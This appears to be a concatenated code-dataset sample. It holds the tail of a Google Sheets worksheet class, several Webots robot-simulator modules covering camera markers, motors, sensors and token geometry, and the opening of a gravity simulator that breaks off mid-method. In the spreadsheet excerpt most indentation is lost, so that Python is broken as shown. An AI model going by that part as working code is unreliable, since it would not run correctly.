Reference: `Protected range Api object <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#protectedrange>`_
        :param start: address of the top left cell
        :param end: address of the bottom right cell
:param returnas: 'json' or 'range'
"""
if not self._linked: return False
request = {"addProtectedRange": {
"protectedRange": {
"range": self.get_gridrange(start, end)
},
}}
drange = self.client.sheet.batch_update(self.spreadsheet.id,
request)['replies'][0]['addProtectedRange']['protectedRange']
if returnas == 'json':
return drange
else:
return DataRange(protectedjson=drange, worksheet=self)
def remove_protected_range(self, range_id):
"""Remove protected range.
Reference: `Protected range Api object`_
:param range_id: ID of the protected range.
"""
if not self._linked: return False
request = {"deleteProtectedRange": {
"protectedRangeId": range_id
}}
return self.client.sheet.batch_update(self.spreadsheet.id, request)
def get_protected_ranges(self):
"""
        Returns the protected ranges in this sheet.
        :return: Protected range objects
        :rtype: :class:`DataRange`
"""
if not self._linked: return False
self.refresh(False)
return [DataRange(protectedjson=x, worksheet=self) for x in self.jsonSheet.get('protectedRanges', {})]
def set_dataframe(self, df, start, copy_index=False, copy_head=True, fit=False, escape_formulae=False, **kwargs):
"""Load sheet from Pandas Dataframe.
Will load all data contained within the Pandas data frame into this worksheet.
        It will begin filling the worksheet at cell start. Supports multi-index and multi-header
        dataframes.
:param df: Pandas data frame.
:param start: Address of the top left corner where the data should be added.
:param copy_index: Copy data frame index (multi index supported).
:param copy_head: Copy header data into first row.
:param fit: Resize the worksheet to fit all data inside if necessary.
        :param escape_formulae: Any value starting with an equal sign (=) will be prefixed with an apostrophe (') to
                                avoid the value being interpreted as a formula.
:param nan: Value with which NaN values are replaced.
"""
if not self._linked:
return False
nan = kwargs.get('nan', "NaN")
start = format_addr(start, 'tuple')
df = df.replace(pd.np.nan, nan)
values = df.astype(str).values.tolist()
(df_rows, df_cols) = df.shape
num_indexes = 1
if copy_index:
if isinstance(df.index, pd.MultiIndex):
num_indexes = len(df.index[0])
for i, indexes in enumerate(df.index):
indexes = map(str, indexes)
for index_item in reversed(list(indexes)):
values[i].insert(0, index_item)
df_cols += num_indexes
else:
for i, val in enumerate(df.index.astype(str)):
values[i].insert(0, val)
df_cols += num_indexes
if copy_head:
            # If multi index, copy indexes in each level to a new row; column/index names are not copied for now
if isinstance(df.columns, pd.MultiIndex):
head = [""]*num_indexes if copy_index else [] # skip index columns
heads = [head[:] for x in df.columns[0]]
for col_head in df.columns:
for i, col_item in enumerate(col_head):
heads[i].append(str(col_item))
values = heads + values
df_rows += len(df.columns[0])
else:
head = [""]*num_indexes if copy_index else [] # skip index columns
                head = [str(h) for h in head]
head.extend(df.columns.tolist())
values.insert(0, head)
df_rows += 1
end = format_addr(tuple([start[0]+df_rows, start[1]+df_cols]))
if fit:
self.cols = start[1] - 1 + df_cols
self.rows = start[0] - 1 + df_rows
# @TODO optimize this
if escape_formulae:
for row in values:
for i in range(len(row)):
if type(row[i]) == str and row[i].startswith('='):
row[i] = "'" + str(row[i])
crange = format_addr(start) + ':' + end
self.update_values(crange=crange, values=values)
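    # Minimal usage sketch (illustration only, not part of the library): assuming `wks` is a
    # linked Worksheet and pandas is imported as pd, write a small frame starting at A1 and
    # grow the sheet if needed:
    #
    #   df = pd.DataFrame({'name': ['a', 'b'], 'score': [1, 2]})
    #   wks.set_dataframe(df, 'A1', copy_head=True, fit=True)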
def get_as_df(self, has_header=True, index_colum=None, start=None, end=None, numerize=True,
empty_value='', value_render=ValueRenderOption.FORMATTED_VALUE, include_tailing_empty=True):
"""
Get the content of this worksheet as a pandas data frame.
:param has_header: Interpret first row as data frame header.
:param index_colum: Column to use as data frame index (integer).
:param numerize: Numerize cell values.
:param empty_value: Placeholder value to represent empty cells when numerizing.
:param start: Top left cell to load into data frame. (default: A1)
:param end: Bottom right cell to load into data frame. (default: (rows, cols))
        :param value_render: How the output values should be returned, `api docs <https://developers.google.com/sheets/api/reference/rest/v4/ValueRenderOption>`__
By default, will convert everything to strings. Setting as UNFORMATTED_VALUE will do
numerizing, but values will be unformatted.
        :param include_tailing_empty: include trailing empty cells in each row
        :returns: pandas.DataFrame
"""
if not self._linked: return False
if not pd:
raise ImportError("pandas")
if start is not None or end is not None:
if end is None:
end = (self.rows, self.cols)
values = self.get_values(start, end, include_tailing_empty=include_tailing_empty, value_render=value_render)
else:
values = self.get_all_values(returnas='matrix', include_tailing_empty=include_tailing_empty,
value_render=value_render)
if numerize:
values = [numericise_all(row[:len(values[0])], empty_value) for row in values]
if has_header:
keys = values[0]
values = [row[:len(values[0])] for row in values[1:]]
df = pd.DataFrame(values, columns=keys)
else:
df = pd.DataFrame(values)
if index_colum:
if index_colum < 1 or index_colum > len(df.columns):
raise ValueError("index_column %s not found" % index_colum)
else:
df.index = df[df.columns[index_colum - 1]]
del df[df.columns[index_colum - 1]]
return df
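    # Minimal usage sketch (illustration only): read the sheet back into pandas, treating the
    # first row as a header and the first column as the index:
    #
    #   df = wks.get_as_df(has_header=True, index_colum=1)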
def export(self, file_format=ExportType.CSV, filename=None, path=''):
"""Export this worksheet to a file.
.. note::
            - Only CSV & TSV exports support single-sheet export. In all other cases the entire \
              spreadsheet will be exported.
            - Exported files can be at most 10 MB in size!
:param file_format: Target file format (default: CSV)
:param filename: Filename (default: spreadsheet id + worksheet index).
:param path: Directory the export will be stored in. (default: current working directory)
"""
if not self._linked:
return
self.client.drive.export(self, file_format=file_format, filename=filename, path=path)
def copy_to(self, spreadsheet_id):
"""Copy this worksheet to another spreadsheet.
This will copy the entire sheet into another spreadsheet and then return the new worksheet.
Can be slow for huge spreadsheets.
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.sheets/copyTo>`__
:param spreadsheet_id: The id this should be copied to.
:returns: Copy of the worksheet in the new spreadsheet.
"""
# TODO: Implement a way to limit returned data. For large spreadsheets.
if not self._linked: return False
response = self.client.sheet.sheets_copy_to(self.spreadsheet.id, self.id, spreadsheet_id)
new_spreadsheet = self.client.open_by_key(spreadsheet_id)
return new_spreadsheet[response['index']]
def sort_range(self, start, end, basecolumnindex=0, sortorder="ASCENDING"):
"""Sorts the data in rows based on the given column index.
:param start: Address of the starting cell of the grid.
:param end: Address of the last cell of the grid to be considered.
        :param basecolumnindex: Index of the base column on which sorting is done (Integer),
                                default value is 0. The index here is the index of the column in the worksheet.
        :param sortorder: either "ASCENDING" or "DESCENDING" (String)
        Example:
        If the data contains 5 rows and 6 columns and sorting is done on the 4th column,
        the values in the other columns move with their rows so that each row stays intact.
"""
if not self._linked: return False
start = format_addr(start, 'tuple')
end = format_addr(end, 'tuple')
request = {"sortRange": {
"range": {
"sheetId": self.id,
"startRowIndex": start[0]-1,
"endRowIndex": end[0],
"startColumnIndex": start[1]-1,
"endColumnIndex": end[1],
},
"sortSpecs": [
{
"dimensionIndex": basecolumnindex,
"sortOrder": sortorder
}
],
}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
def add_chart(self, domain, ranges, title=None, chart_type=ChartType.COLUMN, anchor_cell=None):
"""
        Creates a chart in the sheet and returns a chart object.
        :param domain: Cell range of the desired chart domain in the form of a tuple of addresses
        :param ranges: Cell ranges of the desired ranges in the form of a list of tuples of addresses
        :param title: Title of the chart
        :param chart_type: Basic chart type (default: COLUMN)
        :param anchor_cell: position of the top left corner of the chart in the form of a cell address or cell object
:return: :class:`Chart`
Example:
To plot a chart with x values from 'A1' to 'A6' and y values from 'B1' to 'B6'
>>> wks.add_chart(('A1', 'A6'), [('B1', 'B6')], 'TestChart')
<Chart 'COLUMN' 'TestChart'>
"""
return Chart(self, domain, ranges, chart_type, title, anchor_cell)
def get_charts(self, title=None):
"""Returns a list of chart objects, can be filtered by title.
:param title: title to be matched.
:return: list of :class:`Chart`
"""
matched_charts = []
chart_data = self.client.sheet.get(self.spreadsheet.id,fields='sheets(charts,properties/sheetId)')
sheet_list = chart_data.get('sheets')
sheet = [x for x in sheet_list if x.get('properties', {}).get('sheetId') == self.id][0]
chart_list = sheet.get('charts', [])
for chart in chart_list:
if not title or chart.get('spec', {}).get('title', '') == title:
matched_charts.append(Chart(worksheet=self, json_obj=chart))
return matched_charts
def __eq__(self, other):
return self.id == other.id and self.spreadsheet == other.spreadsheet
# @TODO optimize (use datagrid)
def __iter__(self):
rows = self.get_all_values(majdim='ROWS', include_tailing_empty=False, include_tailing_empty_rows=False)
for row in rows:
yield(row + (self.cols - len(row))*[''])
# @TODO optimize (use datagrid)
def __getitem__(self, item):
if type(item) == int:
if item >= self.cols:
raise CellNotFound
try:
row = self.get_all_values()[item]
except IndexError:
row = ['']*self.cols
return row + (self.cols - len(row))*['']
``` |
{
"source": "13ros27/competition-simulator",
"score": 3
} |
#### File: sr/robot/camera.py
```python
import re
import time
import threading
from enum import Enum
from typing import List, Optional, NamedTuple
from controller import Robot
from sr.robot.vision import (
Face,
Vector,
PolarCoord,
Orientation,
tokens_from_objects,
polar_from_cartesian,
)
Cartesian = NamedTuple("Cartesian", (
("x", float),
("y", float),
("z", float),
))
# Note: we cannot support `image` coordinates for now.
Point = NamedTuple('Point', (
('world', Cartesian),
('polar', PolarCoord),
))
MARKER_MODEL_RE = re.compile(r"^[AGS]\d{0,2}$")
class MarkerType(Enum):
ARENA = "ARENA"
GOLD = "TOKEN_GOLD"
SILVER = "TOKEN_SILVER"
# Existing token types
MARKER_ARENA = MarkerType.ARENA
MARKER_TOKEN_GOLD = MarkerType.GOLD
MARKER_TOKEN_SILVER = MarkerType.SILVER
MarkerInfo = NamedTuple('MarkerInfo', (
('code', int),
('marker_type', MarkerType),
('offset', int),
('size', float),
))
MARKER_MODEL_TYPE_MAP = {
'A': MarkerType.ARENA,
'G': MarkerType.GOLD,
'S': MarkerType.SILVER,
}
MARKER_TYPE_OFFSETS = {
MarkerType.ARENA: 0,
MarkerType.GOLD: 32,
MarkerType.SILVER: 40,
}
MARKER_TYPE_SIZE = {
MarkerType.ARENA: 0.25,
MarkerType.GOLD: 0.2,
MarkerType.SILVER: 0.2,
}
def parse_marker_info(model_id: str) -> Optional[MarkerInfo]:
"""
    Parse the model id of a marker model into a `MarkerInfo`.
Expected input format is a letter and two digits. The letter indicates the
type of the marker, the digits its "libkoki" 'code'.
Examples: 'A00', 'A01', ..., 'G32', 'G33', ..., 'S40', 'S41', ...
"""
match = MARKER_MODEL_RE.match(model_id)
if match is None:
return None
kind, number = model_id[0], model_id[1:]
marker_type = MARKER_MODEL_TYPE_MAP[kind]
code = int(number)
type_offset = MARKER_TYPE_OFFSETS[marker_type]
return MarkerInfo(
code=code,
marker_type=marker_type,
offset=code - type_offset,
size=MARKER_TYPE_SIZE[marker_type],
)
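# Worked example (following the tables above): 'G33' is a gold token marker, so
# parse_marker_info('G33') == MarkerInfo(code=33, marker_type=MarkerType.GOLD, offset=1, size=0.2),
# while a model id that does not match the pattern (e.g. 'X99') returns None.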
class Marker:
# Note: properties in the same order as in the docs.
# Note: we are _not_ supporting image-related properties, so no `res`.
def __init__(self, face: Face, marker_info: MarkerInfo, timestamp: float) -> None:
self._face = face
self.info = marker_info
self.timestamp = timestamp
def __repr__(self) -> str:
return '<Marker: {}>'.format(', '.join((
'info={}'.format(self.info),
'centre={}'.format(self.centre),
'dist={}'.format(self.dist),
'orientation={}'.format(self.orientation),
)))
@staticmethod
def _build_point(vector: Vector) -> Point:
return Point(
world=Cartesian(*vector.data),
polar=polar_from_cartesian(vector),
)
@property
def centre(self) -> Point:
"""A `Point` describing the position of the centre of the marker."""
return self._build_point(self._face.centre_global())
@property
def vertices(self) -> List[Point]:
"""
A list of 4 `Point` instances, each representing the position of the
black corners of the marker.
"""
        # Not quite the black corners of the marker, though fairly close --
# actually the corners of the face of the modelled token.
return [self._build_point(x) for x in self._face.corners_global().values()]
@property
def dist(self) -> float:
"""An alias for `centre.polar.length`."""
return self._face.centre_global().magnitude()
@property
def rot_y(self) -> float:
"""An alias for `centre.polar.rot_y`."""
return self.centre.polar.rot_y
@property
def orientation(self) -> Orientation:
"""An `Orientation` instance describing the orientation of the marker."""
return self._face.orientation()
class Camera:
def __init__(self, webot: Robot, lock: threading.Lock) -> None:
self._webot = webot
self._timestep = int(webot.getBasicTimeStep())
self.camera = webot.getCamera("camera")
self.camera.enable(self._timestep)
self.camera.recognitionEnable(self._timestep)
self._lock = lock
def see(self) -> List[Marker]:
"""
Identify items which the camera can see and return a list of `Marker`
instances describing them.
"""
# Webots appears not to like it if you try to hang on to a
# `CameraRecognitionObject` after another time-step has passed. However
# because we advance the time-steps in a background thread we're likely
# to do that all the time. In order to counter that we have our `Robot`
# pass down its time-step lock so that we can hold that while we do the
# processing. The objects which we pass back to the caller are safe to
# use because they don't refer to Webots' objects at all.
with self._lock:
self._webot.step(self._timestep)
return self._see()
def _see(self) -> List[Marker]:
object_infos = {}
for recognition_object in self.camera.getRecognitionObjects():
marker_info = parse_marker_info(
recognition_object.get_model().decode(errors='replace'),
)
if marker_info:
object_infos[recognition_object] = marker_info
tokens = tokens_from_objects(
object_infos.keys(),
lambda o: object_infos[o].size,
)
when = time.time()
markers = []
for token, recognition_object in tokens:
marker_info = object_infos[recognition_object]
is_2d = marker_info.marker_type == MarkerType.ARENA
for face in token.visible_faces(is_2d=is_2d):
markers.append(Marker(face, marker_info, when))
return markers
```
#### File: sr/robot/motor_devices.py
```python
from controller import Robot
class MotorBase:
def __init__(self, webot: Robot, motor_name: str) -> None:
self.motor_name = motor_name
self.webot_motor = webot.getMotor(motor_name)
self.max_speed = self.webot_motor.getMaxVelocity()
class Wheel(MotorBase):
def __init__(self, webot: Robot, motor_name: str) -> None:
super().__init__(webot, motor_name)
self.webot_motor.setPosition(float('inf'))
self.webot_motor.setVelocity(0)
def set_speed(self, speed):
self.webot_motor.setVelocity(speed)
class LinearMotor(MotorBase):
def __init__(self, webot: Robot, motor_name: str) -> None:
super().__init__(webot, motor_name)
self.webot_motor.setPosition(0)
self.webot_motor.setVelocity(0)
def set_speed(self, speed):
motor = self.webot_motor
if speed < 0:
motor.setPosition(motor.getMinPosition() + 0.01)
else:
motor.setPosition(motor.getMaxPosition())
motor.setVelocity(abs(speed))
class Gripper(MotorBase):
def __init__(self, webot: Robot, motor_name: str) -> None:
self.webot = webot
names = motor_name.split("|")
self.gripper_motors = [
LinearMotor(self.webot, names[0]),
LinearMotor(self.webot, names[1]),
]
self.max_speed = self.gripper_motors[0].max_speed
def set_speed(self, speed):
for motor in self.gripper_motors:
motor.set_speed(speed)
```
#### File: sr/robot/ruggeduino_devices.py
```python
from controller import Robot
from sr.robot.utils import map_to_range
from sr.robot.randomizer import add_jitter
class DistanceSensor:
LOWER_BOUND = 0
UPPER_BOUND = 0.3
def __init__(self, webot: Robot, sensor_name: str) -> None:
self.webot_sensor = webot.getDistanceSensor(sensor_name)
self.webot_sensor.enable(int(webot.getBasicTimeStep()))
def __get_scaled_distance(self):
return map_to_range(
self.webot_sensor.getMinValue(),
self.webot_sensor.getMaxValue(),
DistanceSensor.LOWER_BOUND,
DistanceSensor.UPPER_BOUND,
self.webot_sensor.getValue(),
)
def read_value(self):
return add_jitter(
self.__get_scaled_distance(),
DistanceSensor.LOWER_BOUND,
DistanceSensor.UPPER_BOUND,
)
class Microswitch:
def __init__(self, webot: Robot, sensor_name: str) -> None:
self.webot_sensor = webot.getTouchSensor(sensor_name)
self.webot_sensor.enable(int(webot.getBasicTimeStep()))
def read_value(self):
return self.webot_sensor.getValue() > 0
class Led:
def __init__(self, webot, device_name):
self.webot_sensor = webot.getLED(device_name)
def write_value(self, value):
self.webot_sensor.set(value)
```
#### File: robot/vision/polar.py
```python
import math
from typing import NamedTuple
from .vectors import Vector
PolarCoord = NamedTuple('PolarCoord', (
('length', float),
('rot_x', float),
('rot_y', float),
))
def polar_from_cartesian(cartesian: Vector) -> PolarCoord:
"""
Compute a `PolarCoord` representation of the given 3-vector compatible with
libkoki's "bearing" object.
Returned angles are in degrees.
"""
if len(cartesian) != 3:
raise ValueError(
"Can build polar coordinates for 3-vectors, not {!r}".format(cartesian),
)
x, y, z = cartesian.data
length = cartesian.magnitude()
rot_y = math.atan2(x, z)
rot_x = math.asin(y / length)
return PolarCoord(
length=length,
rot_y=math.degrees(rot_y),
rot_x=math.degrees(rot_x),
)
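# Worked example: for the vector (1, 0, 1), length = sqrt(2), rot_y = atan2(1, 1) = 45 degrees
# and rot_x = asin(0 / sqrt(2)) = 0 degrees, giving roughly
# PolarCoord(length=1.414, rot_x=0.0, rot_y=45.0).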
```
#### File: robot/vision/tokens.py
```python
import enum
import math
from typing import Dict, List, Mapping, NamedTuple
from . import vectors
from .matrix import Matrix
from .vectors import Vector
TOKEN_SIZE = 1
# An orientation object which mimics how libkoki computes its orientation angles.
Orientation = NamedTuple('Orientation', (
('rot_x', float),
('rot_y', float),
('rot_z', float),
))
class FaceName(enum.Enum):
"""
Names of faces on a token in the reference position.
As a token is rotated, the position of a named face also moves within space.
    That means that the "top" face of a token is not necessarily the one called
"Top".
"""
Top = 'top'
Bottom = 'bottom'
Left = 'left'
Right = 'right'
Front = 'front'
Rear = 'rear'
class Token:
"""
Represents a cube which knows its position in space and can be rotated.
Internally this stores its position in space separately from the positions
of its corners, which are stored relative to the centre of the cube.
Tokens have 6 `Face`s, all facing outwards and named for their position on a
reference cube.
"""
def __init__(self, position: Vector, size: float = TOKEN_SIZE) -> None:
self.position = position
self.corners = {
'left-top-front': Vector((-1, 1, -1)) * size,
'right-top-front': Vector((1, 1, -1)) * size,
'left-bottom-front': Vector((-1, -1, -1)) * size,
'right-bottom-front': Vector((1, -1, -1)) * size,
'left-top-rear': Vector((-1, 1, 1)) * size,
'right-top-rear': Vector((1, 1, 1)) * size,
'left-bottom-rear': Vector((-1, -1, 1)) * size,
'right-bottom-rear': Vector((1, -1, 1)) * size,
}
def rotate(self, matrix: Matrix) -> None:
"""
Rotate the token by the given rotation matrix.
"""
self.corners = {
name: matrix * position
for name, position in self.corners.items()
}
def face(self, name: FaceName) -> 'Face':
"""
Get the named `Face` of the token.
As a token is rotated, the position of a named face also moves within
        space. That means that the "top" face of a token is not necessarily the
one called "Top".
"""
return Face(self, name)
def corners_global(self) -> Dict[str, Vector]:
"""
A mapping of the corners of the token (named for their apparent position
on a reference token) to the current position of that corner relative to
the same origin as used to define the position of the token.
"""
return {
name: position + self.position
for name, position in self.corners.items()
}
def visible_faces(self, angle_tolernace: float = 75, is_2d: bool = False) -> 'List[Face]':
"""
Returns a list of the faces which are visible to the global origin.
If a token should be considered 2D, only check its front and rear faces.
"""
face_names = [FaceName.Front, FaceName.Rear] if is_2d else list(FaceName)
faces = [self.face(x) for x in face_names]
return [f for f in faces if f.is_visible_to_global_origin(angle_tolernace)]
class Face:
"""
Represents a specific named face on a token.
This is the primary interface to information about an orientated token.
"""
def __init__(self, token: Token, name: FaceName) -> None:
self.token = token
self.name = name
def __repr__(self) -> str:
return 'Face({!r}, {!r})'.format(self.token, self.name)
def _filter_corners(self, corners: Mapping[str, Vector]) -> Dict[str, Vector]:
return {
name: position
for name, position in corners.items()
if self.name.value in name
}
def corners(self) -> Dict[str, Vector]:
"""
A mapping of the corners of the face (named for their apparent position
on a reference token) to the current position of that corner relative to
the center of the token.
"""
return self._filter_corners(self.token.corners)
def corners_global(self) -> Dict[str, Vector]:
"""
A mapping of the corners of the token (named for their apparent position
on a reference token) to the current position of that corner relative to
the same origin as used to define the position of the token.
"""
return self._filter_corners(self.token.corners_global())
def normal(self) -> Vector:
"""
A unit vector expressing the direction normal to the face of the token.
"""
return vectors.unit_vector(sum(
self.corners().values(),
vectors.ZERO_3VECTOR,
))
def centre(self) -> Vector:
"""
The position of the centre of the face, relative to the token's centre.
"""
corners = self.corners().values()
assert len(corners) == 4
normal = sum(corners, vectors.ZERO_3VECTOR)
return normal / 4
def centre_global(self) -> Vector:
"""
The position of the centre of the face, relative to the origin used for
the token's position.
"""
return self.token.position + self.centre()
def is_visible_to_global_origin(self, angle_tolernace: float = 75) -> bool:
if angle_tolernace > 90:
raise ValueError(
"Refusing to allow faces with angles > 90 to be visible (asked for {})".format(
angle_tolernace,
),
)
direction_to_origin = -self.centre_global()
normal = self.normal()
angle_to_origin = vectors.angle_between(direction_to_origin, normal)
return abs(angle_to_origin) < angle_tolernace
def distance(self) -> float:
"""
The distance to the centre of the face from the origin used for the
token's position.
"""
return self.centre_global().magnitude()
def top_midpoint(self) -> Vector:
"""
The midpoint of the edge which the apparent marker on this face
determines to be the "top" edge. It usually doesn't actually matter
which edge this is, though in some games it does.
        For faces which are not usually vertical, we pick the "rear" of the
        token as the place to put the "top" edge.
        This also matches how the markers were laid out in "Sunny Side Up".
"""
if self.name in (FaceName.Top, FaceName.Bottom):
corners = [
v for n, v in self.corners().items()
if FaceName.Rear.value in n
]
else:
corners = [
v for n, v in self.corners().items()
if FaceName.Top.value in n
]
assert len(corners) == 2, "Wrong number of corners for 'top' edge"
a, b = corners
return (a + b) / 2
def orientation(self) -> Orientation:
n_x, n_y, n_z = self.normal().data
rot_y = math.atan(n_x / n_z)
rot_x = math.asin(n_y)
# Unrotate the normal in X & Y to leave only the Z rotation
sin_x = math.sin(-rot_x)
sin_y = math.sin(-rot_y)
cos_x = math.cos(-rot_x)
cos_y = math.cos(-rot_y)
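        # This appears to be the composition Rx(-rot_x) * Ry(-rot_y): applied to a vector it
        # undoes the Y rotation and then the X rotation derived from the face normal above,
        # leaving only the Z rotation to be recovered from the "top" midpoint below.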
R = Matrix((
(cos_y, 0, sin_y),
(-sin_x * -sin_y, cos_x, -sin_x * cos_y),
(-sin_y * cos_x, sin_x, cos_x * cos_y),
))
unrotated_midpoint = R * self.top_midpoint()
a_x, a_y, _ = unrotated_midpoint.data
rot_z = -math.atan2(a_x, a_y)
return Orientation(
math.degrees(-rot_x),
math.degrees(rot_y),
math.degrees(rot_z),
)
```
#### File: competition-simulator/stubs/controller.py
```python
import enum
from typing import List, Tuple, Optional, Sequence
class Device:
def getModel(self) -> str: ...
# Note: we don't actually know if webots offers up tuples or lists.
class CameraRecognitionObject:
def get_id(self) -> int: ...
def get_position(self) -> Tuple[float, float, float]: ...
def get_orientation(self) -> Tuple[float, float, float, float]: ...
def get_size(self) -> Tuple[float, float]: ...
def get_position_on_image(self) -> Tuple[int, int]: ...
def get_size_on_image(self) -> Tuple[int, int]: ...
def get_number_of_colors(self) -> int: ...
def get_colors(self) -> Sequence[float]: ...
def get_model(self) -> bytes: ...
class Camera(Device):
GENERIC, INFRA_RED, SONAR, LASER = range(4)
def enable(self, samplingPeriod: int) -> None: ...
def disable(self) -> None: ...
def getSamplingPeriod(self) -> int: ...
def getType(self) -> int: ...
def getFov(self) -> float: ...
def getMinFov(self) -> float: ...
def getMaxFov(self) -> float: ...
def setFov(self, fov: float) -> None: ...
def getFocalLength(self) -> float: ...
def getFocalDistance(self) -> float: ...
def getMaxFocalDistance(self) -> float: ...
def getMinFocalDistance(self) -> float: ...
def setFocalDistance(self, focalDistance: float) -> None: ...
def getWidth(self) -> int: ...
def getHeight(self) -> int: ...
def getNear(self) -> float: ...
def getImage(self) -> bytes: ...
@staticmethod
def imageGetRed(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def imageGetGreen(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def imageGetBlue(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def imageGetGray(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def pixelGetRed(pixel: int) -> int: ...
@staticmethod
def pixelGetGreen(pixel: int) -> int: ...
@staticmethod
def pixelGetBlue(pixel: int) -> int: ...
@staticmethod
def pixelGetGray(pixel: int) -> int: ...
def hasRecognition(self) -> bool: ...
def recognitionEnable(self, samplingPeriod: int) -> None: ...
def recognitionDisable(self) -> None: ...
def getRecognitionSamplingPeriod(self) -> int: ...
def getRecognitionNumberOfObjects(self) -> int: ...
def getRecognitionObjects(self) -> List[CameraRecognitionObject]: ...
class DistanceSensor(Device):
GENERIC, INFRA_RED, SONAR, LASER = range(4)
def enable(self, samplingPeriod: int) -> None: ...
def disable(self) -> None: ...
def getSamplingPeriod(self) -> int: ...
def getValue(self) -> float: ...
def getType(self) -> int: ...
def getMaxValue(self) -> float: ...
def getMinValue(self) -> float: ...
def getAperture(self) -> float: ...
class Motor(Device):
def setPosition(self, position: float) -> None: ...
def setVelocity(self, velocity: float) -> None: ...
def setAcceleration(self, acceleration: float) -> None: ...
def setAvailableForce(self, force: float) -> None: ...
def setAvailableTorque(self, torque: float) -> None: ...
def setControlPID(self, p: float, i: float, d: float) -> None: ...
def getTargetPosition(self) -> float: ...
def getMinPosition(self) -> float: ...
def getMaxPosition(self) -> float: ...
def getVelocity(self) -> float: ...
def getMaxVelocity(self) -> float: ...
def getAcceleration(self) -> float: ...
def getAvailableForce(self) -> float: ...
def getMaxForce(self) -> float: ...
def getAvailableTorque(self) -> float: ...
def getMaxTorque(self) -> float: ...
class TouchSensor(Device):
BUMPER, FORCE, FORCE3D = range(3)
def enable(self, samplingPeriod: int) -> None: ...
def disable(self) -> None: ...
def getSamplingPeriod(self) -> int: ...
def getValue(self) -> float: ...
def getValues(self) -> List[float]: ...
def getType(self) -> int: ...
class Robot:
def __init__(self) -> None: ...
def __del__(self) -> None: ...
def step(self, duration: int) -> int: ...
def getTime(self) -> float: ...
def getBasicTimeStep(self) -> float: ...
def getCamera(self, name: str) -> Camera: ...
def getDistanceSensor(self, name: str) -> DistanceSensor: ...
def getMotor(self, name: str) -> Motor: ...
def getTouchSensor(self, name: str) -> TouchSensor: ...
class _SimulationMode(enum.Enum):
# These are probably `int` really, though as the values should be treated
# only as opaque identifiers that doesn't matter.
PAUSE = 'pause'
REAL_TIME = 'real_time'
RUN = 'run'
FAST = 'fast'
class Supervisor(Robot):
SIMULATION_MODE_PAUSE = _SimulationMode.PAUSE
SIMULATION_MODE_REAL_TIME = _SimulationMode.REAL_TIME
SIMULATION_MODE_RUN = _SimulationMode.RUN
SIMULATION_MODE_FAST = _SimulationMode.FAST
def getRoot(self) -> 'Supervisor': ...
def getSelf(self) -> 'Supervisor': ...
def getFromDef(self, name: str) -> 'Supervisor': ...
def getFromId(self, id: int) -> 'Optional[Supervisor]': ...
def getSelected(self) -> 'Supervisor': ...
def remove(self) -> None: ...
def animationStartRecording(self, file: str) -> bool: ...
def animationStopRecording(self) -> bool: ...
def simulationReset(self) -> None: ...
def simulationGetMode(self) -> _SimulationMode: ...
def simulationSetMode(self, mode: _SimulationMode) -> None: ...
def worldLoad(self, file: str) -> None: ...
def worldSave(self, file: Optional[str] = None) -> bool: ...
def worldReload(self) -> None: ...
``` |
{
"source": "13ros27/UniverseSimulator",
"score": 4
} |
#### File: 13ros27/UniverseSimulator/object.py
```python
import math
from copy import deepcopy
# Constants
TIMESTEP = 0.0001
G = 0.00000000006743
c = 299792458
class Vector:
"""A 3-dimensional vector."""
def __init__(self, x, y, z):
"""Create the vector with x, y and z."""
self.x = x
self.y = y
self.z = z
def __repr__(self):
"""Return the vector in a neat form for outputting."""
return f'Vector({self.x}, {self.y}, {self.z})'
def __add__(self, other):
"""Add two vectors together."""
return Vector(self.x+other.x, self.y+other.y, self.z+other.z)
def __sub__(self, other):
"""Subtract a vector from this."""
return Vector(self.x-other.x, self.y-other.y, self.z-other.z)
def __mul__(self, other):
"""Multiply a vector by a number."""
if isinstance(other, (int, float)):
return Vector(self.x*other, self.y*other, self.z*other)
else:
raise TypeError('Can only multiply a vector by a number')
def __truediv__(self, other):
"""Divide a vector by a number."""
if isinstance(other, (int, float)):
return Vector(self.x/other, self.y/other, self.z/other)
else:
            raise TypeError('Can only divide a vector by a number')
def __pow__(self, other):
"""Raise each element of this vector to a power."""
if isinstance(other, (int, float)):
return Vector(self.x**other, self.y**other, self.z**other)
else:
            raise TypeError('Can only raise a vector to a numeric power')
@property
def sum(self):
"""Get the sum of the vector parts."""
return self.x + self.y + self.z
def dist(self, other):
"""Distance between this vector and another."""
return math.sqrt(((self-other)**2).sum)
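    # Worked example: Vector(0, 0, 0).dist(Vector(3, 4, 0)) == 5.0, since
    # sqrt((0-3)**2 + (0-4)**2 + (0-0)**2) = sqrt(25).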
class UnitVector(Vector):
"""A 3-dimensional vector with a length of one."""
def __init__(self, x, y, z):
"""Create the vector with x, y and z."""
length = math.sqrt(x*x + y*y + z*z)
self.x = x/length
self.y = y/length
self.z = z/length
def __repr__(self):
"""Return the vector in a neat form for outputting."""
return f'UnitVector({self.x}, {self.y}, {self.z})'
class Space:
"""Space for any item to exist in."""
def __init__(self):
"""Create a blank list of objects."""
self.objs = []
self.new_objects = []
self.time = 0
def add(self, obj):
"""Add an object to the space."""
if self.new_objects != []:
self.unlock()
self.objs.append(obj)
def objects(self, cur_obj=None):
"""Return the mass and position of all objects except the given one."""
if cur_obj is None:
return self.objs
ret = []
for obj in self.objs:
if obj != cur_obj:
ret.append(obj)
return ret
def unlock(self):
"""Unlocks all objects in this space."""
for i in range(len(self.objs)):
self.objs[i].copy(self.new_objects[i])
def lock(self):
"""Lock all objects in this space."""
self.new_objects = []
for obj in self.objs:
self.new_objects.append(deepcopy(obj))
def step(self, timestep=TIMESTEP):
"""Step all objects in this space while locking their positions."""
self.lock()
for obj in self.new_objects:
obj.step(timestep=timestep)
self.unlock()
self.time += timestep
class Point:
"""A point in space with mass."""
def __init__(self, mass, pos, vel, space):
"""
Create the point with its initial attributes.
- mass: float (kg)
- pos: Vector (m)
        - vel: Vector (m/s)
- space: Space
"""
self.mass = mass
self.pos = pos
self.vel = vel
self.space = space
space.add(self)
self.acc = Vector(0, 0, 0)
def __repr__(self):
"""Return information about the point."""
return f'Point(mass={self.mass}, pos={self.pos}, vel={self.vel})'
def copy(self, other):
"""Copy the important attributes from another point."""
self.pos = other.pos
self.vel = other.vel
def step_pos(self, timestep=TIMESTEP):
